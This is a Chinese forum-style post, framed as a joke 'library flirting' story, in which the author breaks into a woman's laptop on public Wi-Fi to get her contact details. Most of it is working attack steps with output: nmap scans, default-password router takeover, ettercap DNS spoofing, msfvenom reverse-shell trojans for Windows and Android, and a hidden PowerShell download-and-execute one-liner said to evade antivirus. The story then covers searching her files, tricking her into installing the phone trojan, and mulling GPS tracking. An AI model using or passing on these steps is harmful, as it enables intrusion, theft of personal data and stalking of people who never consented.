雞西網站建設制作優化設計[SEO]
本頁定位
在線咨詢

吾群大神《圖書館撩妹記》

Yeshisan1年前 (2018-09-11)2633A+A-

論泡妞的技術含量——下面請看吾群(7717114)大神(Yeshisan)的《圖書館撩妹記》

技術肥宅遇到好看的妹子不敢上去問聯系方式怎么辦? 技術的力量
雖然我們兩個人有一個長得賊帥,還是情圣。但我覺得還是走裝逼路線。

起因

有一位偉人曾經說過:人不可能無緣無故去干一件事情。
簡單交代下起因:圖書館遇到一個妹子,長得很漂亮。

作為一個死宅,上去撩那是不存在的,那么我就想著能不能通過某些方式去獲取她的聯系方式。

我們按照正常的思維來思考,一個人的電腦里會有什么東西。如果電腦內有報名表之類的信息,那么上面是不是有手機號,郵箱這一些聯系方式???

我們的切入點就是電腦。

通過多年的猥瑣經驗,我可以斷定妹子是一個學生,電腦里也有這些東西。(不要問我怎么知道的)

思路

個人電腦并不像服務器擁有固定的IP地址,所以我們搞滲透測試那一套就可以拋棄了。別說沒有固定IP,即使有,在全球怎么多IP里面去找出一個IP地址幾乎不可能。但是圖書館有免費WIFI啊。只要我們連上WIFI那么我們是不是就和妹子處在同一網段下,是不是可以通過探測內網存活IP列表再找出DHCP分配給妹子的內網地址,通過掃描端口進行搞事。

先來看一下當前路由器DHCP給我們分配的IP地址

[email protected]:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.123 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe18:1e36 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:18:1e:36 txqueuelen 1000 (Ethernet)
RX packets 34 bytes 2820 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48 bytes 3407 (3.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

當前的IP地址為:192.168.1.123,那么網關也就是192.168.1.1了
內網的IP地址是0/255,也就是說我們只要掃描0-255這個數值有哪些IP是存活的

[email protected]:~# nmap -sP 192.168.1.0/24

Starting Nmap 7.40 ( [url]https://nmap.org[/url] ) at 2017-06-25 22:35 CST
Nmap scan report for bogon (192.168.1.1)
Host is up (0.0012s latency).
MAC Address: 44:97:5A:A2:CE:FE (Shenzhen Fast Technologies)
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00019s latency).
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Nmap scan report for bogon (192.168.1.103)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.34 seconds

通過nmap進行探測,當前存活的IP一共是106和103這兩個。說明一下這是我復現搭建的環境,實際情況遠不止這幾個IP。那么怎么去判斷哪個IP分配給妹子的呢。
這里可以通過抓取數據包去判斷,當然我選了一種最簡單粗暴的,窺屏。

由于圖書館就怎么幾個人,帶電腦的就我們兩個,還有前臺的電腦。所以我覺得窺屏是最有效的方法。

win10(前臺) win7(妹子)kali linux(我)

那么只要去探測哪個IP的操作系統版本是win7,就可以確定目標。

[email protected]:~# nmap -O 192.168.1.106

Starting Nmap 7.40 ( [url]https://nmap.org[/url] ) at 2017-06-25 22:37 CST
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Vista|7|8.1|2008|Longhorn|2016 (96%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows 10 (96%), Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 10 build 10074 - 10586 (92%), Version 6.1 (Build 7601: Service Pack 1) (92%), Microsoft Windows 10 build 10586 (89%), Microsoft Windows Vista SP2 or Windows 7 Ultimate SP0 - SP1 (89%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at [url]https://nmap.org/submit/[/url] .
Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

最后的檢測結果是106這個IP地址是win7,使用-O參數的同時,nmap會自動去探測目標系統開放的端口服務。那么我們可以通過一些端口服務的漏洞進行搞事。比如說445端口。

通過metasploit對這些服務嘗試漏洞利用,但無果。

跑廁所抽了一根煙,有了一個大膽的想法。既然正面出擊不行,那我可以走迂回路線,先用msf生成木馬,然后通過dns劫持把妹子訪問的所有網址重定向到我的IP上。誘導妹子去下載我們生成的木馬。

但是很多路由器現在都有一些防御機制,比如arp劫持這一些防護,所以我得先把路由器的機制給干掉。打開路由器的界面,默認密碼一敲,進去了。。。。。。。。。突然感覺我的運氣還是不錯的,不管這些細節,直接把路由器的所有防護機制給關了。

然后,先來生成一個exe的木馬。

[email protected]:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe > 1.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

啟動metasploit進行監聽。
msf > use exploit/multi/handler //載入模塊
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp //載入payload,與生成木馬的payload一致
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options //查看需要設置的選項

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123 //設置監聽IP地址
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444 //設置監聽端口
LPORT => 4444
msf exploit(handler) > run //開始監聽

Started reverse TCP handler on 192.168.1.123:4444
Starting the payload handler...
Sending stage (1189423 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21435) at 2017-06-25 22:52:03 +0800
Sending stage (1189423 bytes) to 192.168.1.106
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=unknown state: tlsv1 alert protocol version

生成木馬以后,編輯ettercap工具的dns配置文件進行修改。

Vim /etc/ettercap/etter.dns

通配符 代表所有域名
A和PTR后面的就是指向地址,因為使用的是通配符,也就是說當我們開啟劫持以后,目標無論訪問什么樣的站點,最后都會指向到我們kali的這臺機器
修改完以后開啟Apache服務。

Service apache2 start

之后啟動ettercap,關于ettercap如何進行dns欺騙,不懂的可以看這篇文章。
https://blog.csdn.net/hy_696/article/details/74640519
接著把木馬復制到網站的根目錄下

[email protected]:~$ cp test.exe /var/www/html

注意:你可以寫一個html網頁進行偽裝,比如彈出瀏覽器版本過低請安裝最新版本重新訪問之類的話語,然后彈出下載地址。

在經歷漫長的等待后,msf還是沒有到來自目標的回話。

我又去窺了一下屏,在妹子電腦的右下角看到了一個熟悉的圖標。

略微有點小尷尬,因為生成的木馬是不免殺的,所以99.99%的幾率可能被360攔截了。所以這里需要把木馬做一下免殺,這里我打算用PowerShell生成一段利用代碼保存為bat文件,再次誘導目標下載。經過測試通過360進行查殺,會顯示為病毒。但實際執行的時候,360就瞎了,不會有任何提示。

msf > use exploit/multi/script/web_delivery //載入模塊
msf exploit(web_delivery) > info //查看需要設置的選項

Name: Script Web Delivery
Module: exploit/multi/script/web_delivery
Platform: Python, PHP, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2013-07-19

Provided by:
Andrew Smith "jakx" <[email][email protected][/email]>
Ben Campbell <[email][email protected][/email]>
Chris Campbell

Available targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload information:

Description:
This module quickly fires up a web server that serves a payload. The
provided command will start the specified scripting language
interpreter and then download and execute the payload. The main
purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command
himself, e.g. Command Injection, RDP Session, Local Access or maybe
Remote Command Exec. This attack vector does not write to disk so it
is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH
targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64
machines.

References:
[url]http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html[/url]
[url]http://www.pentestgeek.com/2013/07/19/invoke-shellcode/[/url]
[url]http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/[/url]
[url]http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html[/url]

msf exploit(web_delivery) > set URIPATH / 設置為根路徑
URIPATH => /
msf exploit(web_delivery) > set target 2 //設置保存文件的類型,這里是PSH
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp //payload
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options //查看設置選項

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
2 PSH

msf exploit(web_delivery) > set LHOST 192.168.1.123 //設置反連IP
LHOST => 192.168.1.123
msf exploit(web_delivery) > set LPORT 4444 //設置反連端口
LPORT => 4444
msf exploit(web_delivery) > run //配置好選項直接run,msf會自動生成一端pwoershell的代碼
Exploit running as background job.
Started reverse TCP handler on 192.168.1.123:4444
Using URL: [url]http://0.0.0.0:8080/[/url]
Local IP: [url]http://192.168.1.123:8080/[/url]
Server started.
Run the following command on the target machine:
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/'); 生成的powershell代碼

把最后的這段powershell代碼復制保存為bat文件,移動到網站目錄下。

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/');

當目標運行后,成功拿到一個meterpreter回話

msf exploit(web_delivery) > 192.168.1.106 web_delivery - Delivering Payload
Sending stage (957487 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21669) at 2017-06-25 22:59:02 +0800
sessions 1
Starting interaction with 1...

meterpreter >

有了這個會話我們就可以干很多事情,比如搜索系統上的圖片文件和文檔文件,這些文件內可能就有我們想要的聯系方式,至于圖片嗎。。。這就不說了。。

通過某個word文件成功獲取到妹子的手機號和郵箱,通過微信添加好友搜索到妹子的微信,對比頭像,emmm確認過眼神,你是本人。

然而你以為這樣就結束了嗎?

雖然通過系統上的文件獲取到了聯系方式,但是如果我們能把手機也給搞了,那里面的東西是不是更多,還可以通過手機的GPS獲取到位置。。。。呃。。。后面的我就不說了,發揮想象力吧。

通過內網我們很幸運的獲取到了我們想要的東西,但是妹子只要離開圖書館,我們的木馬就沒有任何作用了,因為在生成木馬的時候,我設置的是連接內網的IP地址。所以我們需要一臺公網的服務器,來長久的控制妹子的手機或者是電腦,至于生成exe木馬我就不重復了,參照上面把IP地址改成公網的就行。下面說一說手機的木馬。由于妹子用的是安卓的手機,這里我們來搞個安卓的木馬。

[email protected]:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT = 4444 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

Error: The following options failed to validate: LPORT.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > run

[-] Handler failed to bind to 192.168.1.123:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...

老套路,還是把木馬移動到根目錄下。

接下來,我的思路是去找妹子借手機,然后訪問kali的ip地址下載這個木馬進行安裝。那么問題來了,怎么樣借到手機。拿起我的手機假裝打電話,隨便找個人什么出車禍了,快掛了。聲淚俱下,突然之間手機就沒電了,然后找妹子借電話。

emmm,妹子還是挺有同情心的。。。

旁邊的哥們一臉懵逼:這TM也行。。。。

出于無聊和好玩并無任何非分想法,我跟妹子說了整件事情,并且和妹子互相交換了微信,直到今天妹子依舊見我一次打我一次。

全部評論: 4
登錄沒有賬號 切換注冊

忘記密碼 ?

注冊已有賬號 切換登錄

15选5走势图开奖